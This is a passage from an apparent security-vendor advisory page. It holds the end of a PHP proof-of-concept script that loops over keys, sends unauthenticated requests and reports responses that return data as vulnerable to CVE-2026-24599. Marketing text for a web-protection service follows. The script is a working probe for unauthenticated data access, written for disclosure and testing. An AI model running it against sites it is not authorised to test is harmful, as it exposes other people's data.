    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Testing key: " . $key . "n";
    echo "HTTP Code: " . $http_code . "n";
    
    if ($response !== false) {
        if (strpos($response, 'error') !== false || strpos($response, 'invalid') !== false) {
            echo "Result: Invalid key or error responsen";
        } else if (!empty(trim($response))) {
            echo "Result: POTENTIALLY VULNERABLE - Received data for keyn";
            echo "Response preview: " . substr($response, 0, 200) . "...n";
        } else {
            echo "Result: Empty responsen";
        }
    } else {
        echo "Result: Request failed - " . curl_error($ch) . "n";
    }
    
    echo "n";
    curl_close($ch);
    
    // Small delay between requests
    sleep(1);
}

echo "Exploitation test complete. If any key returned data without authentication,n";
echo "the site is vulnerable to CVE-2026-24599.n";

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School